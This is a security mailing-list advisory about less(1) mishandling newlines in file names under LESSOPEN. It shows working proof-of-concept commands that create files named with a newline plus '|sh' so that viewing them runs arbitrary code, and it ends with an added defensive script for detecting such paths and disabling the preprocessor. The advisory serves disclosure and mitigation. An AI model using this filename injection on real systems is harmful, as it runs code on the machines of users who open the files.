Date: Fri, 12 Apr 2024 14:20:31 +0200
From: Jakub Wilk
Reply-To: oss-security@lists.openwall.com
Message-ID: <20240412122031.pt2sx6rasca3mgpu@jwilk.net>
Subject: [oss-security] less(1) with LESSOPEN mishandles \n in paths

less(1) does not correctly escape newlines in pathnames when
constructing the command line of the input preprocessor. If a user ran
less(1) on files with untrusted names, this could result in execution of
arbitrary code.

The input preprocessor is enabled by the LESSOPEN environment variable.
But if you didn't set it, don't worry, because zless(1) (or xzless(1),
or zstdless(1)) sets it for you:

    $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')"
    $ zless ./*
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||
    ./
    |sh (file 1 of 2) (END) - Next: ./\

On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the bug
can be exploited even without the wrapper:

    $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 'cowsay pwned' > m/oo && chmod +x m/oo
    $ less ./*/*
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||
    ./
    |m/oo (file 1 of 2) (END) - Next: ./m/oo

Upstream fix:
https://github.com/gwsw/less/commit/007521ac3c95bc76

-- 
Jakub Wilk
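
The following is an added example, not part of the original message: POSIX shell helpers that find paths with an embedded newline under a directory and open files in less with the input preprocessor disabled, for use until the upstream fix is installed. The function names are hypothetical; `-L` (`--no-lessopen`) is the less option that ignores LESSOPEN.

```shell
#!/bin/sh
# Added example: audit and mitigation helpers for the LESSOPEN newline
# issue. Function names are hypothetical, not part of less.

# A literal newline, used in patterns below.
NL='
'

# Succeeds if the argument contains a newline anywhere in the path.
has_newline() {
    case $1 in
        *"$NL"*) return 0 ;;
    esac
    return 1
}

# Print how many paths under $1 (default: .) contain a newline in any
# component. -path is matched against the whole path, so files inside a
# directory whose name contains a newline are counted too. One "x" is
# emitted per match, so newlines in the names cannot skew the count.
count_newline_paths() {
    _n=$(find "${1:-.}" -path "*${NL}*" -exec printf x \; | wc -c)
    echo $((_n))
}

# Open files in less without an input preprocessor. Paths with an
# embedded newline are refused (exit status 2). This calls less directly:
# the zless/xzless/zstdless wrappers set LESSOPEN themselves.
safe_less() {
    for _p in "$@"; do
        if has_newline "$_p"; then
            echo "safe_less: refusing path with embedded newline" >&2
            return 2
        fi
    done
    # Drop any inherited preprocessor and tell less to ignore LESSOPEN.
    ( unset LESSOPEN LESSCLOSE; exec less -L -- "$@" )
}
```

Running `count_newline_paths` over an unpacked archive or upload directory before browsing it shows whether any name there would reach the preprocessor command line with a newline in it.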